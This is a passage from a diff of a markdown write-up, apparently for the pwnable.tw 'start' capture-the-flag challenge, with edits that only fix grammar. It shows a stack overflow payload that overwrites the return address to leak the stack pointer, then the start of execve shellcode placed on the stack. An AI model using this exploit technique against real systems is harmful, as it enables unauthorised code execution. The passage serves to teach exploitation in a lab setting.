F3real/F3real.github.io/content/pwnable_tw_start.md

     'A'* 20 + p32(0x08048087)

-After our first input program will give us stack pointer address and trigger next `read` syscall (since first `ret;` instruction, if we look at original assembly, is after `read`).
-This time we are going to put shellcode on stack and point `EIP` to leaked stack pointer address.
+After our first input, the program will give us a stack pointer address and trigger the next `read` syscall (since first `ret;` instruction, if we look at the original assembly, is after `read`).
+This time we are going to put shellcode on the stack and point `EIP` to leaked stack pointer address.
 Let’s use simple `execve` syscall:

     shellcode = asm('\n'.join([
         'push %d' % u32('/sh\0'),